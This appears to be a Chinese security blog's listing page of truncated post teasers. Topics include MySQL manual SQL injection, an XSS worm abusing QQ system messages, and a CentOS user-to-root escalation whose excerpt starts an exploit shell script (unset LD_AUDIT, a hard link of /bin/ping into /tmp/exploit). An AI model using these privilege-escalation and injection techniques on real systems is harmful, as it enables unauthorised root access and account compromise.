-
删除、恢复wscript.shell
由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。 恢复wscript.shell 建议如果真的为了安全一定要删除这...
-
MySQL数据库5.X版本手工注入总结
MySQL数据库的注入很复杂、很精彩,完全是Access不能比的。因为MySQL的注入很灵活了,完全不像Access那样死板固定,我感觉Access的注入完全是靠人品,或者可以说,谁的表名、列名字典大,谁的成功率就大。 根据我对M...
-
Centos普通用户提权至ROOT
普通用户创建脚本,内容如下: #!/bin/shunset LD_AUDITrm -r -f /tmp/exploitmkdir /tmp/exploitln /bin/ping /tmp/exploit/targetexec 3<...
-
当XSS蠕虫与QQ系统消息推送双剑合璧之后
QQ某处页面存在缺陷,导致我们可以恶意推送QQ系统消息,但是单纯的推送消息并不能太实质性的危害!但是,如果这个“系统消息”的链接能够被我们修改为我们自定义的页面的话,那就危险了!在自定义的页面内,结合一个FLASH...
-
用无线网卡做wifi热点(没有路由器也可以用wifi)
适用环境:你的笔记本有两块网卡,一块有线,一块无线,一个有线路由器,笔记本和有线路由器通过网线连接。1.右键单击网上邻居,选择“属性”。 2.出现如下窗口。 3.右键单击无线网络,选择“属性&rdquo...
